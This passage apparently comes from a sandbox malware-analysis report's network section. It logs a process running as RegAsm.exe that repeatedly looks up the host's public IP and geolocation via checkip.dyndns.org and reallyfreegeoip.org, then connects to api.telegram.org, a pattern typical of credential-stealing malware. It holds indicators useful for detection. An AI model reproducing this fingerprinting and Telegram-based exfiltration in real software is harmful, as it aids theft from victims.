Dec 13, 2024 17:47:59.312799931 CET	443	49728	149.154.167.220	192.168.2.8
Dec 13, 2024 17:47:59.313051939 CET	443	49728	149.154.167.220	192.168.2.8
Dec 13, 2024 17:47:59.314724922 CET	49728	443	192.168.2.8	149.154.167.220
Dec 13, 2024 17:47:59.355338097 CET	443	49728	149.154.167.220	192.168.2.8
Dec 13, 2024 17:47:59.817987919 CET	443	49728	149.154.167.220	192.168.2.8
Dec 13, 2024 17:47:59.818074942 CET	443	49728	149.154.167.220	192.168.2.8
Dec 13, 2024 17:47:59.818419933 CET	49728	443	192.168.2.8	149.154.167.220
Dec 13, 2024 17:47:59.822000980 CET	49728	443	192.168.2.8	149.154.167.220
Dec 13, 2024 17:48:14.324129105 CET	49711	80	192.168.2.8	132.226.8.169

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 17:47:28.061733961 CET	64979	53	192.168.2.8	1.1.1.1
Dec 13, 2024 17:47:28.200185061 CET	53	64979	1.1.1.1	192.168.2.8
Dec 13, 2024 17:47:30.548043966 CET	63967	53	192.168.2.8	1.1.1.1
Dec 13, 2024 17:47:30.995378017 CET	53	63967	1.1.1.1	192.168.2.8
Dec 13, 2024 17:47:57.793018103 CET	56892	53	192.168.2.8	1.1.1.1
Dec 13, 2024 17:47:57.931195974 CET	53	56892	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 17:47:28.061733961 CET	192.168.2.8	1.1.1.1	0xfd59	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:47:30.548043966 CET	192.168.2.8	1.1.1.1	0xca98	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:47:57.793018103 CET	192.168.2.8	1.1.1.1	0x9f6a	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 17:47:28.200185061 CET	1.1.1.1	192.168.2.8	0xfd59	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 13, 2024 17:47:28.200185061 CET	1.1.1.1	192.168.2.8	0xfd59	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:47:28.200185061 CET	1.1.1.1	192.168.2.8	0xfd59	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:47:28.200185061 CET	1.1.1.1	192.168.2.8	0xfd59	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:47:28.200185061 CET	1.1.1.1	192.168.2.8	0xfd59	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:47:28.200185061 CET	1.1.1.1	192.168.2.8	0xfd59	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:47:30.995378017 CET	1.1.1.1	192.168.2.8	0xca98	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:47:30.995378017 CET	1.1.1.1	192.168.2.8	0xca98	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:47:57.931195974 CET	1.1.1.1	192.168.2.8	0x9f6a	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	132.226.8.169	80	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:47:28.336915016 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:47:29.932717085 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:29 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 13, 2024 17:47:29.941494942 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 17:47:30.448084116 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Dec 13, 2024 17:47:32.715142965 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 17:47:33.210464954 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49711	132.226.8.169	80	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:47:35.036549091 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Dec 13, 2024 17:47:36.468311071 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49715	132.226.8.169	80	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:47:38.283648968 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:47:39.726651907 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:39 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49718	132.226.8.169	80	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:47:41.583791018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:47:43.017601013 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49720	132.226.8.169	80	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:47:44.943222046 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:47:46.364022970 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49722	132.226.8.169	80	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:47:48.164143085 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:47:49.614218950 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49724	132.226.8.169	80	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:47:51.416651964 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:47:52.837898016 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49726	132.226.8.169	80	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:47:54.663825035 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Dec 13, 2024 17:47:56.104537964 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	104.21.67.152	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 16:47:32 UTC	875	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97221 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2ULT0sMMQi0zJ7a6z66AU%2FCkaaoKUTXojjQjOjFEagr879LSQhSjzKCXPEv8qfBCzNEP0%2F759tDRM9FfSTi69MxJxj67wgbHkCDs7DaoOqLAF0zKYfABNU%2FXG0RmPSEhVHyKgJj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f176fc44e656a5f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2001&rtt_var=786&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1362575&cwnd=187&unsent_bytes=0&cid=f007827c6790f923&ts=471&x=0"
2024-12-13 16:47:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49709	104.21.67.152	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:34 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-13 16:47:34 UTC	873	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:34 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97223 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O6s7CzSYvPsz78SLgsJ5Lhjal%2FqwQNHnEr7YzqBYcxIUu1WspqIYlL1Q13mmWO65WG65cU4NFE9ocS%2F4npVclNKciJQTMmvzhGFZglrvzhSsjCjarTV6m4Mk6wzQRO0UKiFmGXFv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f176fd22fd642c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1564&rtt_var=620&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1718658&cwnd=208&unsent_bytes=0&cid=40adbbd267f85547&ts=459&x=0"
2024-12-13 16:47:34 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49713	104.21.67.152	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:37 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-13 16:47:38 UTC	877	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:37 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97226 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GhMJQn6%2BM0PIWAb16gLZf8rRTw3GFYfQeWG9pyc4GcVXitpx6pht1ofVKZiKUueecqfLwapodo%2FEhN9l9uREUtS1VQSi65DlC%2FKmuHDyvw%2FGO0U1QLQg2dShBlPl5BU26pRdtg8s"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f176fe659fdf5f6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1496&min_rtt=1494&rtt_var=564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1933774&cwnd=175&unsent_bytes=0&cid=82b2497342d2889c&ts=468&x=0"
2024-12-13 16:47:38 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49717	104.21.67.152	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:40 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-13 16:47:41 UTC	875	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97230 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HYbIoxproKis56UH222qmYcGmf37oj9JbGl4r6z3bMQt4w%2BqMWcEM%2BoD2SAS8xKFU3uT4otVDXViVBU10IinzkJwxmmOkyRmLxE4DH8EEhdQFUykFI5JXtW%2FQX61RZWxCDuNdjzF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f176ffaa92a0f69-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1474&rtt_var=566&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1909744&cwnd=250&unsent_bytes=0&cid=7e83fc78191ca7f7&ts=477&x=0"
2024-12-13 16:47:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49719	104.21.67.152	443	3344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:47:44 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2024-12-13 16:47:44 UTC	873	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:47:44 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 97233 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z%2BK7KsxNAgxlWhnJdfKyog%2BiMHukCUOi0pdw9CwJqSmXgZdhE8UAo4SJGbIKnyDl1I5Y7Llg9cX41X408ylt2uDSandNe06b8mhFfcTIRjjLanSIKAejM1gGNPpRYccKgtsa6Ggy"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f17700f3e190c94-EWR alt-svc: h3=":443"; ma=86400 server-timing: 